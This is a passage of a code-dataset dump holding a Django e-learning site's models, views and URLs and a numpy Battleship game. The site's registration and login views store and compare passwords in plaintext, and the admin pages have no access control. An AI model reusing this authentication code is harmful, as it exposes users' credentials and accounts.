"alphanum_fraction": 0.7455621361732483,
"avg_line_length": 41.25,
"blob_id": "1d303e48c30ad05a94c4be38c25e5dc1e534ac04",
"content_id": "381611a8c1f58c646e31bcc745d2d705f1832f6f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 338,
"license_type": "permissive",
"max_line_length": 71,
"num_lines": 8,
"path": "/eLearn/models/members.py",
"repo_name": "Shehab-Magdy/Ayrid_E-Learn-master",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\nclass Members(models.Model):\n\t\"\"\"docstring for members, data of organizations cooperates with us.\"\"\"\n\tFullName = models.CharField(max_length = 60)\n\tdescription = models.TextField(null = True)\n\tpic = models.FileField(upload_to = 'uploads/membersPhoto/%Y/%m/%d/')\n\tstatus = models.BooleanField(default = True)\n"
},
{
"alpha_fraction": 0.6972860097885132,
"alphanum_fraction": 0.7004175186157227,
"avg_line_length": 38.875,
"blob_id": "1a836b0ba0e7af2eb6d9bf3f6b930db8d2efabe5",
"content_id": "f6a40bfee8e0b0acb896b7aedfb3004c1a6c30e3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 958,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 24,
"path": "/eLearn/views/team.py",
"repo_name": "Shehab-Magdy/Ayrid_E-Learn-master",
"src_encoding": "UTF-8",
"text": "from eLearn.models import ourTeam\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponse\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.urls import reverse\n\n\ndef editTeamMember(request):\n if request.method == 'POST':\n newTeamMember = ourTeam()\n newTeamMember.FullName = request.POST.get('FullName')\n newTeamMember.JobTitle = request.POST.get('JobTitle')\n newTeamMember.description = request.POST.get('description')\n newTeamMember.status = True if request.POST.get('active') else False\n newTeamMember.pic = request.FILES['memberImg']\n newTeamMember.save()\n return render(request, 'admin/adminhome.html')\n elif request.method == 'GET':\n pass\n if ourTeam.objects.all():\n ourteam = ourTeam.objects.all()\n else:\n ourteam=[]\n return render(request, 'admin/adminrotator/ourteam.html', {'ourteam':ourteam})\n\n"
},
{
"alpha_fraction": 0.6967213153839111,
"alphanum_fraction": 0.7049180269241333,
"avg_line_length": 33.71428680419922,
"blob_id": "93d8229333cc65669b989b70bf8d41584611879c",
"content_id": "da4d958a07162c8de2915c220199291585122e97",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 244,
"license_type": "permissive",
"max_line_length": 69,
"num_lines": 7,
"path": "/eLearn/models/haederSlider.py",
"repo_name": "Shehab-Magdy/Ayrid_E-Learn-master",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\n\nclass HaederSlider(models.Model):\n \"\"\"docstring for haeder, images in the slider of the home page\"\"\"\n name = models.CharField(max_length=60)\n pic = models.FileField(upload_to='uploads/slider/%Y/%m/%d/')\n\n"
},
{
"alpha_fraction": 0.7471264600753784,
"alphanum_fraction": 0.7471264600753784,
"avg_line_length": 16.399999618530273,
"blob_id": "6067e07d67f11ff8163967404302e399cf5a3a08",
"content_id": "51f8236e004cab4ffb0004ffa2e6b9b938cb5dc6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 87,
"license_type": "permissive",
"max_line_length": 33,
"num_lines": 5,
"path": "/eLearn/apps.py",
"repo_name": "Shehab-Magdy/Ayrid_E-Learn-master",
"src_encoding": "UTF-8",
"text": "from django.apps import AppConfig\n\n\nclass ElearnConfig(AppConfig):\n name = 'eLearn'\n"
},
{
"alpha_fraction": 0.7194473743438721,
"alphanum_fraction": 0.7194473743438721,
"avg_line_length": 48.52631759643555,
"blob_id": "b6336ec12dd83b676b518f9ac40cf9e7c1e8b21f",
"content_id": "2fb572679045adbc3286ce5e1ab9382e12da3c74",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 941,
"license_type": "permissive",
"max_line_length": 103,
"num_lines": 19,
"path": "/eLearn/urls.py",
"repo_name": "Shehab-Magdy/Ayrid_E-Learn-master",
"src_encoding": "UTF-8",
"text": "from django.urls import path\nfrom django.conf.urls import url\nfrom django.conf.urls.static import static\nfrom .views import registration, home, admin, rotator, members, team, subscribers, contact_us, about_us\n\napp_name = 'eLearn'\n\nurlpatterns = [\n path('', home.index, name='elearn.home'),\n path('register/', registration.newRegistration, name='elearn.newRegistration'),\n path('login/', registration.login, name='elearn.login'),\n path('adminhome/', admin.home, name='elearn.admin'),\n path('admin/saverotator/', rotator.saveRotator, name='elearn.saverotator'),\n path('admin/members/', members.editMembers, name='elearn.members'),\n path('admin/ourTeam/', team.editTeamMember, name='elearn.ourTeam'),\n path('admin/subscribers/', subscribers.editSubscribers, name='elearn.subscribers'),\n path('contact-us/', contact_us.contactUs, name='elearn.contactUs'),\n path('about_us/', about_us.about, name='elearn.about'),\n]\n"
},
{
"alpha_fraction": 0.8294051885604858,
"alphanum_fraction": 0.8294051885604858,
"avg_line_length": 37.739131927490234,
"blob_id": "81e732701484e7cabcea2be284e730bfef11f2d4",
"content_id": "b770b9569980ff0dee243dd22169cdc1856276b7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 891,
"license_type": "permissive",
"max_line_length": 130,
"num_lines": 23,
"path": "/eLearn/admin.py",
"repo_name": "Shehab-Magdy/Ayrid_E-Learn-master",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\n\n# Register your models here.\nfrom .models import Registration, SystemSettings, SiteSubscribers, Events, EventDetails, ContactUS, HaederSlider, Members, ourTeam\n# from .models.registration import Registration\n# from .models.systemSettings import SystemSettings\n# from .models.siteSubscribers import SiteSubscribers\n# from .models.events import Events\n# from .models.eventDetails import EventDetails\n# from .models.contactUS import ContactUS\n# from .models.haederSlider import HaederSlider\n# from .models.members import Members\n# from .models.ourteam import ourTeam\n\nadmin.site.register(Registration)\nadmin.site.register(SystemSettings)\nadmin.site.register(SiteSubscribers)\nadmin.site.register(Events)\nadmin.site.register(EventDetails)\nadmin.site.register(ContactUS)\nadmin.site.register(HaederSlider)\nadmin.site.register(Members)\nadmin.site.register(ourTeam)\n"
},
{
"alpha_fraction": 0.8571428656578064,
"alphanum_fraction": 0.8571428656578064,
"avg_line_length": 42,
"blob_id": "df8fb020a938a4b740544becfa882b6ad9d00d0e",
"content_id": "6e51d4326967b0aa2ad91a08093a772ad422d8b6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 42,
"license_type": "permissive",
"max_line_length": 42,
"num_lines": 1,
"path": "/eLearn/forms/__init__.py",
"repo_name": "Shehab-Magdy/Ayrid_E-Learn-master",
"src_encoding": "UTF-8",
"text": "from .contact_us_form import ContactUsForm"
},
{
"alpha_fraction": 0.6622428894042969,
"alphanum_fraction": 0.6642335653305054,
"avg_line_length": 37.64102554321289,
"blob_id": "3e647c6036b218ab6eb62a0e5a3319752c1cd69e",
"content_id": "661c96daa96a009ac30e4a8ec6a0e35bb2326a09",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1507,
"license_type": "permissive",
"max_line_length": 84,
"num_lines": 39,
"path": "/eLearn/views/registration.py",
"repo_name": "Shehab-Magdy/Ayrid_E-Learn-master",
"src_encoding": "UTF-8",
"text": "from eLearn.models import Registration\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponse\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.urls import reverse\n\n\ndef newRegistration(request):\n if request.method == 'GET':\n return render(request, 'registration/registration.html')\n elif request.method == 'POST':\n email = request.POST.get('email')\n password = request.POST.get('password')\n phoneno = request.POST.get('phone')\n fullname = request.POST.get('fullname')\n birthdate = request.POST.get('birthdate')\n profileimage = request.FILES['profileimage']\n newreg = Registration()\n newreg.email = email\n newreg.password = password\n newreg.phoneNumber = phoneno\n newreg.fullName = fullname\n newreg.birthDate = birthdate\n newreg.Profilephoto = profileimage\n newreg.save()\n return render(request, 'registration/login.html')\n\n\ndef login(request):\n if request.method == 'GET':\n return render(request, 'registration/login.html')\n elif request.method == 'POST':\n ema = request.POST.get('email')\n passw = request.POST.get('password')\n try:\n logedinUser = Registration.objects.get(email=ema , password=passw)\n return render(request, 'home/index.html')\n except Registration.DoesNotExist:\n return HttpResponse('Email or Password is incorrect')\n"
},
{
"alpha_fraction": 0.8120805621147156,
"alphanum_fraction": 0.8221476674079895,
"avg_line_length": 36.125,
"blob_id": "d70ca5dbd9e0af852caf299f77a0a475ae894789",
"content_id": "cc872dce409f62f96bbb512463d23210967536b2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 298,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 8,
"path": "/eLearn/views/admin.py",
"repo_name": "Shehab-Magdy/Ayrid_E-Learn-master",
"src_encoding": "UTF-8",
"text": "from eLearn.models import Registration\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponse\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.urls import reverse\n\ndef home(request):\n return render(request,'admin/adminhome.html')\n\n"
},
{
"alpha_fraction": 0.8606811165809631,
"alphanum_fraction": 0.8606811165809631,
"avg_line_length": 34.88888931274414,
"blob_id": "179c091f8e543f4d905a455c5a9561de9dfd51c1",
"content_id": "6784747e2f0774bd498bbbb9a97ca85452e56ad4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 323,
"license_type": "permissive",
"max_line_length": 44,
"num_lines": 9,
"path": "/eLearn/models/__init__.py",
"repo_name": "Shehab-Magdy/Ayrid_E-Learn-master",
"src_encoding": "UTF-8",
"text": "from .registration import Registration\nfrom .systemSettings import SystemSettings\nfrom .siteSubscribers import SiteSubscribers\nfrom .events import Events\nfrom .eventDetails import EventDetails\nfrom .contactUS import ContactUS\nfrom .haederSlider import HaederSlider\nfrom .members import Members\nfrom .ourteam import ourTeam\n"
},
{
"alpha_fraction": 0.7427937984466553,
"alphanum_fraction": 0.7472283840179443,
"avg_line_length": 44.099998474121094,
"blob_id": "013e27851deed3a35377d7b7c89777edeab4747c",
"content_id": "4b94f7844340628c046cf6806458edeeb43e1a68",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 451,
"license_type": "permissive",
"max_line_length": 69,
"num_lines": 10,
"path": "/eLearn/models/eventDetails.py",
"repo_name": "Shehab-Magdy/Ayrid_E-Learn-master",
"src_encoding": "UTF-8",
"text": "from django.db import models\nfrom .events import Events\n\nclass EventDetails(models.Model):\n\t\"\"\"docstring for EventDetails, descrip events details and program\"\"\"\n\tevent = models.ForeignKey(Events, on_delete = models.CASCADE)\n\ttitle = models.CharField(max_length = 60)\n\tstartTime = models.DateTimeField(null = True, blank = True)\n\tendTime = models.DateTimeField(null = True, blank = True)\n\tpic = models.FileField(upload_to = 'uploads/events/%Y/%m/%d/')\n"
},
{
"alpha_fraction": 0.6974359154701233,
"alphanum_fraction": 0.7076923251152039,
"avg_line_length": 35.5625,
"blob_id": "8c4988b3559b5ce0395b2d4b30efe384d06de88b",
"content_id": "c39cfbd5cdb3f9062069098e65dcb6e767c4f912",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 585,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 16,
"path": "/eLearn/models/events.py",
"repo_name": "Shehab-Magdy/Ayrid_E-Learn-master",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\n\nclass Events(models.Model):\n \"\"\"docstring for events, collecting events data\"\"\"\n name = models.CharField(max_length=60)\n startDate = models.DateTimeField(null=True, blank=True)\n endDate = models.DateTimeField(null=True, blank=True)\n location = models.CharField(max_length=60)\n contactPhone = models.CharField(max_length=60)\n description = models.TextField(null=True)\n pic = models.FileField(upload_to='uploads/events/%Y/%m/%d/')\n eventStatus = models.BooleanField(default=True)\n\n def __str__(self):\n return self.name\n"
},
{
"alpha_fraction": 0.769911527633667,
"alphanum_fraction": 0.7831858396530151,
"avg_line_length": 36.66666793823242,
"blob_id": "ce8fcef32dc557b2a33171204491942be69edef7",
"content_id": "b52f3b7b8d3daba038305c76084f78212bfaf733",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 226,
"license_type": "permissive",
"max_line_length": 67,
"num_lines": 6,
"path": "/eLearn/models/siteSubscribers.py",
"repo_name": "Shehab-Magdy/Ayrid_E-Learn-master",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\nclass SiteSubscribers(models.Model):\n\t\"\"\"docstring for SiteSubscribers, collecting subscribers emails\"\"\"\n\temail = models.EmailField(max_length = 254)\n\tstatus = models.BooleanField(default = True)\n"
},
{
"alpha_fraction": 0.7247191071510315,
"alphanum_fraction": 0.7359550595283508,
"avg_line_length": 38.55555725097656,
"blob_id": "0de03f730f7fd82c10d36836167419521b25bc70",
"content_id": "c6e9a1017cbd27fb32458698aab7bd665affcf47",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 356,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 9,
"path": "/eLearn/models/ourteam.py",
"repo_name": "Shehab-Magdy/Ayrid_E-Learn-master",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\nclass ourTeam(models.Model):\n\t\"\"\"docstring for ourTeam, Ayrid team members\"\"\"\n\tFullName = models.CharField(max_length = 60)\n\tdescription = models.TextField(null = True)\n\tJobTitle = models.CharField(max_length = 60)\n\tpic = models.FileField(upload_to = 'uploads/ourTeam/%Y/%m/%d/')\n\tstatus = models.BooleanField(default = True)\n"
},
{
"alpha_fraction": 0.6930052042007446,
"alphanum_fraction": 0.7163212299346924,
"avg_line_length": 37.599998474121094,
"blob_id": "985b8444c78f4a24a1c0df805e9a5e6ea6445f09",
"content_id": "4d1af5250f0165debc0c0ff8eeb3503b6f06fe46",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 772,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 20,
"path": "/eLearn/models/registration.py",
"repo_name": "Shehab-Magdy/Ayrid_E-Learn-master",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\n\nclass Registration(models.Model):\n \n \"\"\"docstring for registration, registration info.\"\"\"\n email = models.EmailField(max_length=254)\n password = models.CharField(max_length=60)\n phoneNumber = models.CharField(max_length=30)\n fullName = models.CharField(max_length=60)\n birthDate = models.DateField(null=True, blank=True)\n status = models.BooleanField(default=True)\n activeUser = models.BooleanField(default=0)\n # file will be saved to MEDIA_ROOT/uploads/regphoto/2015/01/30\n Profilephoto = models.FileField(upload_to='uploads/regPhotos/%Y/%m/%d/')\n creationDate = models.DateField(auto_now_add=True)\n lastModifiedDate = models.DateField(auto_now=True)\n\n def __str__(self):\n return self.email\n"
},
{
"alpha_fraction": 0.7103448510169983,
"alphanum_fraction": 0.7137930989265442,
"avg_line_length": 40.19047546386719,
"blob_id": "b2f24ea353455df27f310b777d3ffbedf4f7bfbc",
"content_id": "7eb8817af65eb0d9c1a8338b8fbada249c9a1a61",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 870,
"license_type": "permissive",
"max_line_length": 140,
"num_lines": 21,
"path": "/eLearn/views/subscribers.py",
"repo_name": "Shehab-Magdy/Ayrid_E-Learn-master",
"src_encoding": "UTF-8",
"text": "from eLearn.models import SiteSubscribers\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponse\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.urls import reverse\n\n\ndef editSubscribers(request):\n if request.method == 'POST':\n newTeamMember = SiteSubscribers()\n newTeamMember.email = request.POST.get('email')\n newTeamMember.status = True if request.POST.get('active') else False\n newTeamMember.save()\n return redirect(reverse('eLearn:elearn.home'))\n elif request.method == 'GET':\n pass\n if SiteSubscribers.objects.all():\n subscribers = SiteSubscribers.objects.all()\n else:\n subscribers=[]\n return redirect(reverse('eLearn:elearn.admin'), {'subscribers':subscribers})#render(request, 'elearn.home', {'subscribers':subscribers})\n \n"
},
{
"alpha_fraction": 0.602721095085144,
"alphanum_fraction": 0.6557823419570923,
"avg_line_length": 44.9375,
"blob_id": "f060b7f6b062af67d7fb5bed6a455303972a0c21",
"content_id": "05fee33622e52c8e478de10ae60d47af67ea6f86",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 735,
"license_type": "permissive",
"max_line_length": 191,
"num_lines": 16,
"path": "/eLearn/views/home.py",
"repo_name": "Shehab-Magdy/Ayrid_E-Learn-master",
"src_encoding": "UTF-8",
"text": "from eLearn.models import Registration, HaederSlider\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponse\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.urls import reverse\n\ndef index(request):\n if HaederSlider.objects.all():\n a = HaederSlider.objects.all()\n b=[]\n for i in a:\n b.append(i.pic.url)\n data = {'url0': b[0], 'url1': b[1], 'url2': b[2], 'url3': b[3]}\n else:\n data = {'url0': 'http://placekitten.com/g/300/200', 'url1': 'http://placekitten.com/g/300/200', 'url2': 'http://placekitten.com/g/300/200', 'url3': 'http://placekitten.com/g/300/200'}\n return render(request,'home/index.html', {'data':data})\n"
},
{
"alpha_fraction": 0.7323943376541138,
"alphanum_fraction": 0.7605633735656738,
"avg_line_length": 34.5,
"blob_id": "032df1c2fb339e9c98ea8c298b9585b37df1fc8e",
"content_id": "4bbeeb8256358230524dcf2a8e246da31551f370",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 213,
"license_type": "permissive",
"max_line_length": 60,
"num_lines": 6,
"path": "/eLearn/models/systemSettings.py",
"repo_name": "Shehab-Magdy/Ayrid_E-Learn-master",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\nclass SystemSettings(models.Model):\n\t\"\"\"docstring for SystemSettings, Mail setting and others\"\"\"\n\tkey = models.CharField(max_length = 200)\n\tvalue = models.CharField(max_length = 200)\n"
},
{
"alpha_fraction": 0.552293598651886,
"alphanum_fraction": 0.5834862589836121,
"avg_line_length": 43.18918991088867,
"blob_id": "ff3e57df493cf511edff43e09e65b4cf1bcf3fdb",
"content_id": "20acf64881db33151f8def9dd950af5612303b2f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1635,
"license_type": "permissive",
"max_line_length": 195,
"num_lines": 37,
"path": "/eLearn/views/rotator.py",
"repo_name": "Shehab-Magdy/Ayrid_E-Learn-master",
"src_encoding": "UTF-8",
"text": "from eLearn.models import Registration, HaederSlider\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponse\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.urls import reverse\n\n\ndef saveRotator(request):\n names = ['1st_slide','2nd_slide','3rd_slide','4th_slide']\n if request.method == 'POST':\n if HaederSlider.objects.all():\n st = HaederSlider.objects.get(name=names[0])\n nd = HaederSlider.objects.get(name=names[1])\n rd = HaederSlider.objects.get(name=names[2])\n th = HaederSlider.objects.get(name=names[3]) \n st.pic = request.FILES[names[0]]\n nd.pic = request.FILES[names[1]]\n rd.pic = request.FILES[names[2]]\n th.pic = request.FILES[names[3]]\n st.save()\n nd.save()\n rd.save()\n th.save()\n else:\n for n in names:\n HaederSlider.objects.create(name = n,pic = request.FILES[n])\n return redirect(reverse('eLearn:elearn.admin'))\n elif request.method == 'GET':\n if HaederSlider.objects.all():\n a = HaederSlider.objects.all()\n b=[]\n for i in a:\n b.append(i.pic.url)\n data = {'url0': b[0], 'url1': b[1], 'url2': b[2], 'url3': b[3]}\n else:\n data = {'url0': 'http://placekitten.com/g/300/200', 'url1': 'http://placekitten.com/g/300/200', 'url2': 'http://placekitten.com/g/300/200', 'url3': 'http://placekitten.com/g/300/200'}\n return render(request, 'admin/adminrotator/rotator.html', {'data':data})\n"
},
{
"alpha_fraction": 0.7410468459129333,
"alphanum_fraction": 0.7603305578231812,
"avg_line_length": 39.33333206176758,
"blob_id": "870468b3eda4b8a1ccc16b9268ee0570cc41b19c",
"content_id": "5ba38095c027eb18167e1003c2ae701f228e5479",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 363,
"license_type": "permissive",
"max_line_length": 71,
"num_lines": 9,
"path": "/eLearn/models/contactUS.py",
"repo_name": "Shehab-Magdy/Ayrid_E-Learn-master",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\nclass ContactUS(models.Model):\n\t\"\"\"docstring for ContactUS, visitors messages throw contact us page\"\"\"\n\tfirstName = models.CharField(max_length = 60)\n\tlastName = models.CharField(max_length = 60)\n\temail = models.EmailField(max_length = 254)\n\tmessage = models.TextField(null = True)\n\treplyStatus = models.BooleanField(default = True)\n"
}
] | 24 |
zackerman24/Battleship-Simulator | https://github.com/zackerman24/Battleship-Simulator | 01e5b5b38bc7e9015d9598f3d101c99e632e183f | 3f29187d7d0f6b854f9df49a852d3a906c302f1b | 300f670dc6f2f584d98da368c7bdb7869221ea21 | refs/heads/master | 2020-07-19T11:07:25.677858 | 2019-09-23T01:14:32 | 2019-09-23T01:14:32 | 206,437,079 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5993788838386536,
"alphanum_fraction": 0.6257764101028442,
"avg_line_length": 31.21666717529297,
"blob_id": "50f1031193e2719589178443b4e09a934c5ce1d1",
"content_id": "3e25028c27f7ee0770141832581d650e01e6d626",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1932,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 60,
"path": "/tbd.py",
"repo_name": "zackerman24/Battleship-Simulator",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Sep 4 20:12:40 2019\n\n@author: Zackerman24\n\"\"\"\n\nimport numpy as np\nimport game_setup as gs\n\n\"\"\"There's probably a way of creating six separate lists for each letter\n and then combining them into one array. Look into this after?\"\"\"\n\nbase_array = np.array([['A1', 'A2', 'A3', 'A4', 'A5', 'A6'],\n ['B1', 'B2', 'B3', 'B4', 'B5', 'B6'],\n ['C1', 'C2', 'C3', 'C4', 'C5', 'C6'], \n ['D1', 'D2', 'D3', 'D4', 'D5', 'D6'],\n ['E1', 'E2', 'E3', 'E4', 'E5', 'E6'],\n ['F1', 'F2', 'F3', 'F4', 'F5', 'F6']])\n\nplayer_one_ships_array = np.copy(base_array)\nplayer_two_ships_array = np.copy(base_array)\nplayer_one_placements = []\nplayer_two_placements = []\n\nprint(\"\\nAt any point in play, enter 'Exit' to exit the game.\")\n\nprint(\"\\nPlayer One select first. Place coordinates on your map.\")\nprint(player_one_ships_array)\ngs.create_ships(base_array,player_one_ships_array,player_one_placements)\n\nprint(\"\\nPlayer Two now selects. Place coordinates on your map.\")\nprint(player_two_ships_array)\ngs.create_ships(base_array,player_two_ships_array,player_two_placements)\n\nwhile True:\n print(\"\\nPlayer One's turn.\")\n gs.player_move(base_array,player_two_ships_array,player_two_placements)\n print(\"\\nPlayer Two's turn.\")\n gs.player_move(base_array,player_one_ships_array,player_one_placements)\n \n if not player_one_placements:\n break\n \n elif not player_two_placements:\n break\n \n else:\n continue\n\nexit()\n\n\"\"\"\nShips will be represented in each player's array as X's\nEach player will also have a 'targets' array, tracking their moves\nWhen a player enters a move, it will reference the original array\n to identify the index location of the guess, and then search\n the opposing player's array at that spot to see if it has struck\n\"\"\""
},
{
"alpha_fraction": 0.8111110925674438,
"alphanum_fraction": 0.8111110925674438,
"avg_line_length": 44,
"blob_id": "c05770be7fea24478e75d4743a723765e2032aab",
"content_id": "ee6ad1aa06f4620176a5b64a445246bbd45bf496",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 90,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 2,
"path": "/README.md",
"repo_name": "zackerman24/Battleship-Simulator",
"src_encoding": "UTF-8",
"text": "# Battleship-Simulator\nSimple way to play Battleship with a friend on one local computer.\n"
},
{
"alpha_fraction": 0.5643796324729919,
"alphanum_fraction": 0.5766252279281616,
"avg_line_length": 34.375797271728516,
"blob_id": "f44395e5cec63bdbf25ba66075f5c09832ac5d01",
"content_id": "68e9c826c5bf869dba2e799a77f0961a76f1d8ac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5553,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 157,
"path": "/game_setup.py",
"repo_name": "zackerman24/Battleship-Simulator",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Sep 8 17:44:53 2019\n\n@author: Zackerman24\n\"\"\"\n\n\"\"\"For checking correct coord entry, could make sure entry is in\nA - F and 1-6\"\"\"\n\"\"\"Shave off extra space on any user input\"\"\"\n\"\"\"Make sure coordinate entries are unique, not duplicative\"\"\"\n\nimport numpy as np\n\ndef create_battleship(game_array, player_array, player_placements):\n \"\"\"Creates a user's 4-coordinate long battleship.\"\"\"\n \n coordinates = input((\"\\nEnter four adjacent coordinates for your Battleship\"\n \", separated by a space: \"))\n \n split_coord = coordinates.split()\n \n while True:\n if coordinates.upper() == \"EXIT\":\n exit()\n elif len(split_coord) != 4:\n print(\"Invalid coordinate entry. Please try again.\")\n coordinates = input((\"\\nEnter four adjacent coordinates\"\n \"for your Battleship\"\n \", separated only by a space: \"))\n split_coord = coordinates.split()\n continue\n else:\n break\n \n placements = []\n \n for coord in split_coord:\n raw_spot = np.where(game_array == coord)\n spot = list(zip(raw_spot[0],raw_spot[1]))\n placements.append(spot)\n \n for place in placements:\n place_1 = place[0]\n player_placements.append(player_array[place_1[0],place_1[1]])\n player_array[place_1[0],place_1[1]] = 'BS'\n \n print(player_array)\n \ndef create_cruiser(game_array, player_array, player_placements):\n \"\"\"Creates a user's 3-coordinate long cruiser.\"\"\"\n \n coordinates = input((\"\\nEnter three adjacent coordinates for your Cruiser\"\n \", separated by a space: \"))\n \n split_coord = coordinates.split()\n \n while True:\n if coordinates.upper() == \"EXIT\":\n exit()\n elif len(split_coord) != 3:\n print(\"Invalid coordinate entry. Please try again.\")\n coordinates = input((\"\\nEnter three adjacent coordinates\"\n \"for your Cruiser\"\n \", separated only by a space: \"))\n split_coord = coordinates.split()\n continue\n else:\n break\n \n placements = []\n \n for coord in split_coord:\n raw_spot = np.where(game_array == coord)\n spot = list(zip(raw_spot[0],raw_spot[1]))\n placements.append(spot)\n \n for place in placements:\n place_1 = place[0]\n player_placements.append(player_array[place_1[0],place_1[1]])\n player_array[place_1[0],place_1[1]] = 'CR'\n \n print(player_array)\n\ndef create_destroyer(game_array, player_array, player_placements):\n \"\"\"Creates a user's 2-coordinate long destroyer.\"\"\"\n \n coordinates = input((\"\\nEnter two adjacent coordinates for your Destroyer\"\n \", separated by a space: \"))\n \n split_coord = coordinates.split()\n \n while True:\n if coordinates.upper() == \"EXIT\":\n exit()\n elif len(split_coord) != 2:\n print(\"\\nInvalid coordinate entry. 
Please try again.\")\n coordinates = input((\"\\nEnter two adjacent coordinates\"\n \"for your Destroyer\"\n \", separated only by a space: \"))\n split_coord = coordinates.split()\n continue\n else:\n break\n \n placements = []\n \n for coord in split_coord:\n raw_spot = np.where(game_array == coord)\n spot = list(zip(raw_spot[0],raw_spot[1]))\n placements.append(spot)\n \n for place in placements:\n place_1 = place[0]\n player_placements.append(player_array[place_1[0],place_1[1]])\n player_array[place_1[0],place_1[1]] = 'DT'\n \n print(player_array)\n\ndef create_ships(game_array, player_array, player_placements):\n \"\"\"Function to create all three of a players ships.\"\"\"\n \n create_battleship(game_array, player_array, player_placements)\n create_cruiser(game_array, player_array, player_placements)\n create_destroyer(game_array, player_array, player_placements)\n \ndef player_move(game_array, opponent_array, opponent_placements):\n \"\"\"Allows a player to enter an attack coordinate.\"\"\"\n \n attack = input(\"\\nEnter the coordinate you'd like to attack:\")\n \n if attack.upper() == \"EXIT\":\n exit()\n \n\n if attack in opponent_placements:\n raw_spot = np.where(game_array == attack)\n spot = list(zip(raw_spot[0],raw_spot[1]))\n attack_coordinate = spot[0]\n if opponent_array[attack_coordinate[0],attack_coordinate[1]] == \"BS\":\n print(\"\\nSuccess! You've hit your opponent's battleship.\")\n elif opponent_array[attack_coordinate[0],attack_coordinate[1]] == \"CR\":\n print(\"\\nSuccess! You've hit your opponent's cruiser.\")\n elif opponent_array[attack_coordinate[0],attack_coordinate[1]] == \"DT\":\n print(\"\\nSuccess! You've hit your opponent's destroyer.\")\n else:\n print(\"We're not sure what you hit!\") \n opponent_placements.remove(attack)\n if not opponent_placements:\n print(\"\\nCongratulations! You destroyed all your opponent's ships.\")\n print(\"The game will now shutdown.\")\n exit()\n else:\n print(\"Your opponent only has \" + str(len(opponent_placements)) + \" spots left.\")\n else:\n print(\"Oops! Your attack did not strike any ships.\")"
}
] | 3 |
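Note on the placement lookup in game_setup.py above: every ship function maps a coordinate label such as "C4" to a row/column pair with np.where(game_array == coord), which returns a tuple of index arrays. A minimal sketch of that lookup, assuming a 6x6 label grid (make_label_grid is a hypothetical helper, not part of the repo):

    import numpy as np

    def make_label_grid():
        # Hypothetical: labels A1..F6 laid out row by row
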